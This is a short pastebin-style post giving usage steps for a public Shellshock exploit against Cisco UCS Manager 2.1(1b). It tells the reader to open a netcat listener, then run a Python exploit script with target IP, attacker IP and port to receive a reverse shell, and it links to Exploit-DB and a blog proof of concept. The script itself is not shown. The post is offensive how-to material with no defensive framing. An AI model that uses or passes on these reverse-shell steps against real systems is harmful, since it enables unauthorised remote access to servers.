Cisco UCS Manager 2.1(1b) - Shellshock Exploit


SUBMITTED BY: sahertian

DATE: June 19, 2016, 11:47 a.m.

FORMAT: Text only

SIZE: 592 Bytes

HITS: 632

  1. I try this based on thatchrisecker. exploit at Exploit-DB.
  2. You can find the exploit here https://www.exploit-db.com/exploits/39568/
  3. The command
  4. Run netcut on your machine
  5. # nc -lvp <listening port>
  6. Run exploit and pointing to your netcut ip and listening port
  7. # python cisco-uscm.py <target ip> <your ip> <your listening port>
  8. If your target is vulnerable, you'll get connection form target ip to your netcut listening port
  9. The picture and proof of concept you can see on my blog https://evilc0de.blogspot.com/2016/03/cisco-ucs-manager-211b-shellshock.html
  10. Thank you :)

comments powered by Disqus